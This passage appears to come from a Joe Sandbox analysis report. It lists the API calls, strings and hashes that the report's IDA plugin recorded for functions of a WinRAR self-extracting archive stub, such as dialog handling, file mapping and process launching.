                                                                                                                        • SetFocus.USER32(00000000), ref: 00EAB9B8
                                                                                                                        • _swprintf.LIBCMT ref: 00EABA24
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                          • Part of subcall function 00EAD4D4: GetDlgItem.USER32(00000068,00EEFCB8), ref: 00EAD4E8
                                                                                                                          • Part of subcall function 00EAD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00EAAF07,00000001,?,?,00EAB7B9,00EC506C,00EEFCB8,00EEFCB8,00001000,00000000,00000000), ref: 00EAD510
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00EAD51B
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00EC35F4), ref: 00EAD529
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EAD53F
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00EAD559
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EAD59D
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00EAD5AB
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EAD5BA
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EAD5E1
                                                                                                                          • Part of subcall function 00EAD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00EC43F4), ref: 00EAD5F0
                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00EABA68
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00EABA90
                                                                                                                        • GetTickCount.KERNEL32 ref: 00EABAAE
                                                                                                                        • _swprintf.LIBCMT ref: 00EABAC2
                                                                                                                        • GetLastError.KERNEL32(?,00000011), ref: 00EABAF4
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00EABB43
                                                                                                                        • _swprintf.LIBCMT ref: 00EABB7C
                                                                                                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00EABBD0
                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00EABBEA
                                                                                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00EABC47
                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00EABC6F
                                                                                                                        • Sleep.KERNEL32(00000064), ref: 00EABCB9
                                                                                                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00EABCE2
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EABCEB
                                                                                                                        • _swprintf.LIBCMT ref: 00EABD1E
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00EABD7D
                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,00EC35F4), ref: 00EABD94
                                                                                                                        • GetDlgItem.USER32(?,00000065), ref: 00EABD9D
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00EABDAC
                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EABDBB
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00EABE68
                                                                                                                        • _wcslen.LIBCMT ref: 00EABEBE
                                                                                                                        • _swprintf.LIBCMT ref: 00EABEE8
                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00EABF32
                                                                                                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00EABF4C
                                                                                                                        • GetDlgItem.USER32(?,00000068), ref: 00EABF55
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00EABF6B
                                                                                                                        • GetDlgItem.USER32(?,00000066), ref: 00EABF85
                                                                                                                        • SetWindowTextW.USER32(00000000,00EDA472), ref: 00EABFA7
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00EAC007
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00EAC01A
                                                                                                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00EAC0BD
                                                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00EAC197
                                                                                                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00EAC1D9
                                                                                                                          • Part of subcall function 00EAC73F: __EH_prolog.LIBCMT ref: 00EAC744
                                                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00EAC1FD
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<$STARTDLG$^$__tmp_rar_sfx_access_check_%u$h$winrarsfxmappingfile.tmp$Q
                                                                                                                        • API String ID: 3829768659-4153176784
                                                                                                                        • Opcode ID: 1c77b8a8d3995fd5af95dd8aea6b63540be0cb4d49c25fdad2489a207f961eb5
                                                                                                                        • Instruction ID: e8a53717f1d3bd7a15909d4cf249f6c1160f4eaf99407aa64177d852a9c1cd87
                                                                                                                        • Opcode Fuzzy Hash: 1c77b8a8d3995fd5af95dd8aea6b63540be0cb4d49c25fdad2489a207f961eb5
                                                                                                                        • Instruction Fuzzy Hash: AA422871940248BEEB21AB71DD4AFBE77BCAB0A704F145056F640BA1D3CB756E48CB21

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph of the code starting at ea0863; legend: Executed, Not Executed]
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32), ref: 00EA087C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00EA088E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00EA08BF
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00EA0B69
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EA0B83
                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00EA0B93
                                                                                                                        • ReadFile.KERNEL32(00000000,?,00007FFE,|<,00000000), ref: 00EA0BB1
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EA0C09
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00EA0C1E
                                                                                                                        • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<,?,00000000,?,00000800), ref: 00EA0C72
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00EA0C9C
                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,D=,00000800), ref: 00EA0CD8
                                                                                                                          • Part of subcall function 00EA081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EA0836
                                                                                                                          • Part of subcall function 00EA081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E9F2D8,Crypt32.dll,00000000,00E9F35C,?,?,00E9F33E,?,?,?), ref: 00EA0858
                                                                                                                        • _swprintf.LIBCMT ref: 00EA0D4A
                                                                                                                        • _swprintf.LIBCMT ref: 00EA0D96
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • AllocConsole.KERNEL32 ref: 00EA0D9E
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00EA0DA8
                                                                                                                        • AttachConsole.KERNEL32(00000000), ref: 00EA0DAF
                                                                                                                        • _wcslen.LIBCMT ref: 00EA0DC4
                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00EA0DD5
                                                                                                                        • WriteConsoleW.KERNEL32(00000000), ref: 00EA0DDC
                                                                                                                        • Sleep.KERNEL32(00002710), ref: 00EA0DE7
                                                                                                                        • FreeConsole.KERNEL32 ref: 00EA0DED
                                                                                                                        • ExitProcess.KERNEL32 ref: 00EA0DF5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                        • String ID: (=$,<$,@$0?$0A$4B$8>$D=$DXGIDebug.dll$H?$H@$HA$P>$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=$`@$d?$dA$dwmapi.dll$h=$h>$kernel32$uxtheme.dll$|<$|?$|@$<$>$?$@$A
                                                                                                                        • API String ID: 1207345701-31210346
                                                                                                                        • Opcode ID: e1318f0a6498e2fbd8b2d4b51a7d79ea726878adbee6accc19b66a6a42ba71a6
                                                                                                                        • Instruction ID: d6e6fa839fc31422bd9726c47fba54b02509fc283123460e2885951ecc8721a8
                                                                                                                        • Opcode Fuzzy Hash: e1318f0a6498e2fbd8b2d4b51a7d79ea726878adbee6accc19b66a6a42ba71a6
                                                                                                                        • Instruction Fuzzy Hash: F1D175B1008384AFD7319F60C94AFDFBAE8BBC5704F50A91DF185BA150C772964ACB62

                                                                                                                        Control-flow Graph

                                                                                                                        [Control-flow graph of the code starting at eac73f; legend: Executed, Not Executed]
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00EAC744
                                                                                                                          • Part of subcall function 00EAB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00EAB3FB
                                                                                                                          • Part of subcall function 00EAAF98: _wcschr.LIBVCRUNTIME ref: 00EAB033
                                                                                                                        • _wcslen.LIBCMT ref: 00EACA0A
                                                                                                                        • _wcslen.LIBCMT ref: 00EACA13
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00EACA71
                                                                                                                        • _wcslen.LIBCMT ref: 00EACAB3
                                                                                                                        • _wcsrchr.LIBVCRUNTIME ref: 00EACBFB
                                                                                                                        • GetDlgItem.USER32(?,00000066), ref: 00EACC36
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00EACC46
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,00EDA472), ref: 00EACC54
                                                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EACC7F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                                                                                                                        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$
                                                                                                                        • API String ID: 986293930-3342974870
                                                                                                                        • Opcode ID: c1e4f10038d55994c61724562fb8bcf4023918298e4c2f63c374c24672cfffdf
                                                                                                                        • Instruction ID: e0ea0f4ecfa45e934882983c097ae64e02bb9187da2577574ee793a96edf5796
                                                                                                                        • Opcode Fuzzy Hash: c1e4f10038d55994c61724562fb8bcf4023918298e4c2f63c374c24672cfffdf
                                                                                                                        • Instruction Fuzzy Hash: FFE16672900258AADF24DB60DD85EEF73BCAF49314F1454A6F54AF7040EB74AF448B61
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E9DA70
                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 00E9DA91
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E9DAAC
                                                                                                                          • Part of subcall function 00E9C29A: _wcslen.LIBCMT ref: 00E9C2A2
                                                                                                                          • Part of subcall function 00EA05DA: _wcslen.LIBCMT ref: 00EA05E0
                                                                                                                          • Part of subcall function 00EA1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E9BAE9,00000000,?,?,?,0001043A), ref: 00EA1BA0
                                                                                                                        • _wcslen.LIBCMT ref: 00E9DDE9
                                                                                                                        • __fprintf_l.LIBCMT ref: 00E9DF1C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9
                                                                                                                        • API String ID: 557298264-1836506137
                                                                                                                        • Opcode ID: 9db68ba05f633254b914bd61ec619b6ea4f8f00dc32c99bea5fef1d586dd6fe5
                                                                                                                        • Instruction ID: ed0393b34b47deef86205ddce960e23854f86da7383fd9374793129940f2fa78
                                                                                                                        • Opcode Fuzzy Hash: 9db68ba05f633254b914bd61ec619b6ea4f8f00dc32c99bea5fef1d586dd6fe5
                                                                                                                        • Instruction Fuzzy Hash: 7232C071904218EACF24EF68CC42BEE77A5FF48304F40655AFA05BB291EBB19D85CB50

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EAB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00EAB579
                                                                                                                          • Part of subcall function 00EAB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00EAB58A
                                                                                                                          • Part of subcall function 00EAB568: IsDialogMessageW.USER32(0001043A,?), ref: 00EAB59E
                                                                                                                          • Part of subcall function 00EAB568: TranslateMessage.USER32(?), ref: 00EAB5AC
                                                                                                                          • Part of subcall function 00EAB568: DispatchMessageW.USER32(?), ref: 00EAB5B6
                                                                                                                        • GetDlgItem.USER32(00000068,00EEFCB8), ref: 00EAD4E8
                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00EAAF07,00000001,?,?,00EAB7B9,00EC506C,00EEFCB8,00EEFCB8,00001000,00000000,00000000), ref: 00EAD510
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00EAD51B
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00EC35F4), ref: 00EAD529
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EAD53F
                                                                                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00EAD559
                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EAD59D
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00EAD5AB
                                                                                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00EAD5BA
                                                                                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00EAD5E1
                                                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00EC43F4), ref: 00EAD5F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                        • String ID: \
                                                                                                                        • API String ID: 3569833718-2967466578
                                                                                                                        • Opcode ID: c10df23d60dff0683cbf48971b406a7c7d9597a0a33c43605358c4dc21f8bdda
                                                                                                                        • Instruction ID: ad53918e07b5ac4198566bcec8d6311b0245557a4b79816818f60a9adc46f6a2
                                                                                                                        • Opcode Fuzzy Hash: c10df23d60dff0683cbf48971b406a7c7d9597a0a33c43605358c4dc21f8bdda
                                                                                                                        • Instruction Fuzzy Hash: F431B171145342BFE301DF35EC4AFAB7FACEB86708F00050AF551A61A1DB659A09C776

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00EAD7AE
                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00EAD8DE
                                                                                                                        • ShowWindow.USER32(?,00000000), ref: 00EAD91D
                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00EAD959
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00EAD97F
                                                                                                                        • ShowWindow.USER32(?,00000001), ref: 00EAD9E1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                        • String ID: .exe$.inf$PDu<$h$r
                                                                                                                        • API String ID: 36480843-2155249188
                                                                                                                        • Opcode ID: b87f4121764fa43cfa8532b67d07b579e0aec4a023a52aa0eeee043a59858990
                                                                                                                        • Instruction ID: 53088602ecda8347c9fbba5ed4059e40e9df6c1e8f07a48be4fe11d013f1c5ba
                                                                                                                        • Opcode Fuzzy Hash: b87f4121764fa43cfa8532b67d07b579e0aec4a023a52aa0eeee043a59858990
                                                                                                                        • Instruction Fuzzy Hash: A051E43000C3849EDB209B259C44BABBBE4AF8B748F04241EF4C2BF591E7B5E948C752

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00EB5695,00EB5695,?,?,?,00EBABAC,00000001,00000001,2DE85006), ref: 00EBA9B5
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00EBABAC,00000001,00000001,2DE85006,?,?,?), ref: 00EBAA3B
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00EBAB35
                                                                                                                        • __freea.LIBCMT ref: 00EBAB42
                                                                                                                          • Part of subcall function 00EB8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EBCA2C,00000000,?,00EB6CBE,?,00000008,?,00EB91E0,?,?,?), ref: 00EB8E38
                                                                                                                        • __freea.LIBCMT ref: 00EBAB4B
                                                                                                                        • __freea.LIBCMT ref: 00EBAB70
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1414292761-0
                                                                                                                        • Opcode ID: 2ebe99ef3d6890e901ce82fb0321f2c17e181679e9dbedf4813c316ac91a5b3f
                                                                                                                        • Instruction ID: fdb670012d72872c08f139fe4f23c269b6d323f06717fcfed10b5201b8778f48
                                                                                                                        • Opcode Fuzzy Hash: 2ebe99ef3d6890e901ce82fb0321f2c17e181679e9dbedf4813c316ac91a5b3f
                                                                                                                        • Instruction Fuzzy Hash: 1E51BF72600216AFDF258E64CC82EFBB7AAEB44754B19563DFC14F6150EB34DC40D6A2

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00EB3C35,?,?,00EF2088,00000000,?,00EB3D60,00000004,InitializeCriticalSectionEx,00EC6394,InitializeCriticalSectionEx,00000000), ref: 00EB3C03
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 3664257935-2084034818
                                                                                                                        • Opcode ID: aaed153d925b1506c2735a8a5adfdda4bf46908cc921f463cf281ad48ea221a5
                                                                                                                        • Instruction ID: 22042767c07d8267631dd039056731d1a08954ba3aea1a4064e3e90d117db080
                                                                                                                        • Opcode Fuzzy Hash: aaed153d925b1506c2735a8a5adfdda4bf46908cc921f463cf281ad48ea221a5
                                                                                                                        • Instruction Fuzzy Hash: 1D110636A04221ABCF228B7D9C82FDB77A49F01774F211221E911FB294E771EF058AD1

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EA081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00EA0836
                                                                                                                          • Part of subcall function 00EA081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E9F2D8,Crypt32.dll,00000000,00E9F35C,?,?,00E9F33E,?,?,?), ref: 00EA0858
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00EAAC2F
                                                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00EAAC66
                                                                                                                        • SHGetMalloc.SHELL32(00ED8438), ref: 00EAAC70
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                        • String ID: riched20.dll$3Oo
                                                                                                                        • API String ID: 3498096277-671628130
                                                                                                                        • Opcode ID: ac4c11d8bce61036f9de42574a6fba6178c6f890beb563e1e53f0a20a4307bec
